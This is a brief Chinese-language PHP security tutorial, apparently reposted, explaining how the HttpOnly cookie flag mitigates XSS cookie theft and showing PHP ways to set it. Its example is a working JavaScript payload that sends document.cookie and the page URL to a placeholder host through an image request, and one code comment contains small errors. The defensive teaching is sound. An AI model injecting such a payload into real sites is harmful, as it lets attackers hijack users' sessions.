xss的概念就不用多說了，它的危害是極大的，這就意味著一旦你的網(wǎng)站出現(xiàn)xss漏洞，就可以執(zhí)行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持，如果這里面包含了大量敏感信息（身份信息，管理員信息）等，那完了。。。

如下js獲取cookie信息：

復(fù)制代碼 代碼如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是從document對(duì)象中獲取的，現(xiàn)在瀏覽器在設(shè)置Cookie的時(shí)候一般都接受一個(gè)叫做HttpOnly的參數(shù)，跟domain等其他參數(shù)一樣，一旦這個(gè)HttpOnly被設(shè)置，你在瀏覽器的document對(duì)象中就看不到Cookie了。

php設(shè)置HttpOnly：

復(fù)制代碼 代碼如下:
//在php.ini中，session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七個(gè)參數(shù)設(shè)置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對(duì)于php5.1以前版本的php通過：

復(fù)制代碼 代碼如下:
header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是萬能的！

php技術(shù)：xss防御之php利用httponly防xss攻擊，轉(zhuǎn)載需保留來源！

鄭重聲明：本文版權(quán)歸原作者所有，轉(zhuǎn)載文章僅為傳播更多信息之目的，如作者信息標(biāo)記有誤，請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除，多謝。